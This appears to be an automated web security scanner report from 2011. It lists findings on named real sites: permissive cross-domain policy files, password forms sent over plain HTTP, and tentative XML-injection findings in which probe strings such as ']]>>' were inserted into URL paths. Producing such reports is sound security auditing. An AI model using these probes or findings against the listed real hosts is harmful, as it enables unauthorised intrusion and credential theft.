Host: | http://www.livejournal |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.livejournal.com |
HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Mon, 25 Apr 2011 14:27:55 GMT Content-Type: text/xml Connection: close X-AWS-Id: ws07 Set-Cookie: ljuniq=BlrhjlxYzDyERwT Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT ETag: "bb0fbb-26b-49eb04f04f400 Accept-Ranges: bytes Content-Length: 619 X-Varnish: 1789549813 Age: 0 Via: 1.1 varnish <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-coss-domain ...[SNIP]... <allow-access-from domain="wh.lj.ru"/> <allow-access-from domain="ljaqua.wh.lj.ru"/> <allow-access-from domain="swfplayer.services <allow-access-from domain="player.livejournal.ru"/> <allow-access-from domain="player.championat.net"/> <allow-access-from domain="player.gazeta.ru"/> <allow-access-from domain="player.quto.ru"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Mon, 25 Apr 2011 14:31:42 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.voicefive.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Tue, 26 Apr 2011 14:23:30 GMT Date: Mon, 25 Apr 2011 14:23:30 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://beacon.secure |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: beacon.securestudies.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Tue, 26 Apr 2011 14:50:23 GMT Date: Mon, 25 Apr 2011 14:50:23 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pl.yumenetworks |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: pl.yumenetworks.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:53:49 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2 Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT ETag: "21a082c-135-49ebc23 Accept-Ranges: bytes Content-Length: 309 P3P: policyref="http://ads Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> </allow-from> <grant-to> <resourc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 25 Apr 2011 13:07:06 GMT Expires: Tue, 26 Apr 2011 13:07:06 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 6181 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://demo.kayako.com |
Path: | /supportsuite/index.php |
GET /supportsuite/index.php HTTP/1.1 Host: demo.kayako.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km__last_visit=988416873; km__last_activity |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:41:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.9 Set-Cookie: SWIFT_sessionid40 Connection: close Content-Type: text/html Content-Length: 16066 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <head> <meta http-equiv="Content-Type" content="text/html; charset=UT ...[SNIP]... <td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://demo ...[SNIP]... <td><input type="password" name="loginpassword" value="" class="loginpassword"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://direct.yandex.ru |
Path: | / |
GET /?partner HTTP/1.1 Host: direct.yandex.ru Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:35:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Host Content-Length: 25502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="nojs"> <head> <meta http-equiv="X-UA ...[SNIP]... </a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport > <input name="login"/> <input name="passwd" type="password"/> <input name="twoweeks" type="checkbox" value="yes"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://direct.yandex.ru |
Path: | /pages/direct/_direct |
GET /pages/direct/_direct Host: direct.yandex.ru Proxy-Connection: keep-alive Referer: http://direct.yandex.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:36:36 GMT Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT Connection: keep-alive Expires: Tue, 26 Apr 2011 14:36:36 GMT Cache-Control: max-age=86400 Content-Length: 432639 var ADDRESS_STREET_PREFIXES=" ...[SNIP]... ion_popup-50-50")&&window ...[SNIP]... <div class="b-input"><input class="b-input__text" id="b-domik_popup ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mail.ru |
Path: | / |
GET / HTTP/1.1 Host: mail.ru Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FTID=2jmTRp3gv_ms |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:24:37 GMT Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17 Connection: close Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru Set-Cookie: mrcu=D5824DB58425049 Cache-Control: no-cache,no-store,must Pragma: no-cache Expires: Sun, 25 Apr 2010 14:24:37 GMT Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT Vary: Accept-Encoding Content-Type: text/html; charset=windows-1251 Content-Length: 114440 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head ...[SNIP]... <div class="relative z100 m"> <form name="Auth" method="post" action="http://e.mail.ru <img src="http://limg.imgsmail ...[SNIP]... <td><input type="password" class="long" size="15" name="Password" tabindex="5" value="" /></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://my.webalta.ru |
Path: | /public/engine/templates |
GET /public/engine/templates Host: my.webalta.ru Proxy-Connection: keep-alive Referer: http://my.webalta.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=165308000 |
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Mon, 25 Apr 2011 14:27:32 GMT Content-Type: application/x-javascript Content-Length: 17139 Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Mon, 16 May 2011 14:27:32 GMT Cache-Control: max-age=1814400 Accept-Ranges: bytes // // // .................. ............ function tmpl_favicon(url) { url = url.replace('http://', '') + '/'; url = url.substr(0, url.indexOf('/')); var sub1 = url.substr(0, 2); var ...[SNIP]... <td><form action="#" onsubmit="f_input(this); return false;" >'; str+='E-mail:<br> ...[SNIP]... <br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\' str+= '<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://my.webalta.ru |
Path: | /public/engine/templates |
GET /public/engine/templates Host: my.webalta.ru Proxy-Connection: keep-alive Referer: http://my.webalta.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=165308000 |
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Mon, 25 Apr 2011 14:27:32 GMT Content-Type: application/x-javascript Content-Length: 17139 Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Mon, 16 May 2011 14:27:32 GMT Cache-Control: max-age=1814400 Accept-Ranges: bytes // // // .................. ............ function tmpl_favicon(url) { url = url.replace('http://', '') + '/'; url = url.substr(0, url.indexOf('/')); var sub1 = url.substr(0, 2); var ...[SNIP]... <td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >'; str+='................... s ...[SNIP]... <br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\' str+='<br> ...[SNIP]... <br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\' str+= '<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://odnoklassniki.ru |
Path: | / |
GET / HTTP/1.1 Host: odnoklassniki.ru Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/ Cache-Control: no-cache Cache-Control: no-store Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Rendered-Blocks: HtmlPage Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 25 Apr 2011 14:26:36 GMT Content-Length: 13753 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html><head><title>...... <meta http-equiv="Content-Type" con ...[SNIP]... <div class="panelBox_body"><form action="http://www ...[SNIP]... </label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pda.loveplanet.ru |
Path: | / |
GET / HTTP/1.1 Host: pda.loveplanet.ru Proxy-Connection: keep-alive Referer: http://my.webalta.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:51:44 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru Set-Cookie: affiliate_reff=http%3A%2F Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 25 Apr 2011 14:51:44 GMT Content-Length: 11125 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html><head> <title>.................. ...[SNIP]... <div class="bl_login bg_lightgray"> <form method="post" action="/a-logon/" name="login"> <input type="hidden" name="a" value="logon"> ...[SNIP]... <nobr>............ <input type="password" class="itxt" size="5" name="password" id="password"></nobr> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pretty.ru |
Path: | / |
GET / HTTP/1.1 Host: pretty.ru Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:24:33 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 25 Apr 2011 14:24:33 GMT Content-Length: 59765 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html><head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8 ...[SNIP]... <td> <form method="post" action="/a-logon/" name="login"> <input type="hidden" name="a" value="logon"> ...[SNIP]... <input type="text" name="auid" id="auid" size="10"> ............ <input type="password" size="10" name="password" id="password"> <input type="submit" value=".........." class="button"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://support.trust |
Path: | / |
GET / HTTP/1.1 Host: support.trust-guard.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:12:04 GMT Server: Apache/1.3.41 Ben-SSL/1.59 X-Powered-By: PHP/5.2.17 Content-Type: text/html Content-Length: 14128 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <head> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]... <td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support ...[SNIP]... <td><input type="password" name="loginpassword" value="" class="loginpassword"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://support.trust |
Path: | /index.php |
GET /index.php?_m=troubl Host: support.trust-guard.com Proxy-Connection: keep-alive Referer: http://support.trust User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:12:49 GMT Server: Apache/1.3.41 Ben-SSL/1.59 X-Powered-By: PHP/5.2.17 Content-Type: text/html Content-Length: 12475 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e ...[SNIP]... <td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support ...[SNIP]... <td><input type="password" name="loginpassword" value="" class="loginpassword"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://vkontakte.ru |
Path: | / |
GET / HTTP/1.1 Host: vkontakte.ru Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Mon, 25 Apr 2011 14:23:04 GMT Content-Type: text/html; charset=windows-1251 Connection: keep-alive X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru Pragma: no-cache Cache-control: no-store Vary: Accept-Encoding Content-Length: 12904 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type=" ...[SNIP]... <div id="quick_login"> <form method="POST" name="login" id="quick_login_form" action="http://login.vk <input type="hidden" name="act" value="login" /> ...[SNIP]... <div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /account.php |
GET /account.php HTTP/1.1 Host: www.integritydefender.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:45:58 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 13118 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <td valign="top" style="border-right:1px dotted #cccccc;"> <form action="action/user <div style="width:370px; padding-left:100px; padding-bottom:10px;"> ...[SNIP]... <td width="214" align="left" valign="middle"><input name="userPassword" type="password" id="userPassword" class="signin-textbox" /></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.marketgid.com |
Path: | /pnews/773204/i/7269/pp/2 |
GET /pnews/773204/i/7269/pp/2 Host: www.marketgid.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MGformStatus=2; __utma=250877338 |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:31:32 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Keep-Alive: timeout=20 Cache-Control: no-cache, must-revalidate Content-Length: 48728 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <div class="menu_body" style="margin-bottom:5px" <form id="mg-auth-form-1" action="http://usr <div> ...[SNIP]... </div> <input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ripoffreport |
Path: | /LoginPage.aspx |
GET /LoginPage.aspx HTTP/1.1 Host: www.ripoffreport.com Proxy-Connection: keep-alive Referer: http://www.ripoffreport User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=38277280 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 16:25:18 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Expires: -1 X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXAUTH=204DAD60EB P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA" ROR-NODE: 09 Content-Length: 18684 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1" ...[SNIP]... <body> <form name="aspnetForm" method="post" action="/LoginPage.aspx" id="aspnetForm"> <div> ...[SNIP]... <td><input name="ctl00$ctl00 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://api.facebook.com |
Path: | /restserver.php |
GET /restserver.php?v=1.0 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=ituyTcnawc6q7Vc |
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset Expires: Mon, 25 Apr 2011 08:22:36 -0700 Pragma: X-FB-Rev: 370179 X-FB-Server: 10.32.44.124 X-Cnection: close Date: Mon, 25 Apr 2011 15:20:36 GMT Content-Length: 773 fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://api.flickr.com |
Path: | /services/feeds/photos |
GET /services/feeds/photos Host: api.flickr.com Proxy-Connection: keep-alive Referer: http://www.kayako.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:42:06 GMT P3P: policyref="http://p3p Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Wed, 09 Mar 2011 01:14:03 GMT Cache-Control: no-store, no-cache, must-revalidate, private Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-Served-By: www25.flickr.mud.yahoo Connection: close Content-Type: application/atom+xml; charset=utf-8 Content-Length: 32163 <?xml version="1.0" encoding="utf-8" standalone="yes"?> <feed xmlns="http://www.w3.org xmlns:dc="http://purl.org xmlns:flickr="urn:flickr: xmlns:media=" ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://l-files.livej |
Path: | /userapps/4/image |
GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1 Host: l-files.livejournal.net Proxy-Connection: keep-alive Referer: http://www.livejournal User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Mon, 25 Apr 2011 15:05:37 GMT Content-Type: text/html; charset=utf-8 Retry-After: 0 X-Varnish: 1987947190 Age: 0 Via: 1.1 varnish Content-Length: 368 Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>200 OK</title> </hea ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://l-files.livej |
Path: | /userapps/4/image |
GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1 Host: l-files.livejournal.net Proxy-Connection: keep-alive Referer: http://www.livejournal User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Mon, 25 Apr 2011 15:05:50 GMT Content-Type: text/html; charset=utf-8 Retry-After: 0 X-Varnish: 1698422522 Age: 0 Via: 1.1 varnish Content-Length: 368 Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>200 OK</title> </hea ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://l-files.livej |
Path: | /userapps/4/image |
GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1 Host: l-files.livejournal.net Proxy-Connection: keep-alive Referer: http://www.livejournal User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Mon, 25 Apr 2011 15:06:06 GMT Content-Type: text/html; charset=utf-8 Retry-After: 0 X-Varnish: 610014231 Age: 0 Via: 1.1 varnish Content-Length: 367 Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>200 OK</title> </hea ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.netdiligence |
Path: | /xml_content/stories.xml |
GET /xml_content]]>>/stories.xml HTTP/1.1 Host: www.netdiligence.com Proxy-Connection: keep-alive Referer: http://www.netdiligence Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=116969625 |
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 16:29:02 GMT Server: Apache Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /xml_content]]>> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://checkout.netsuite |
Path: | /core/media/media.nl |
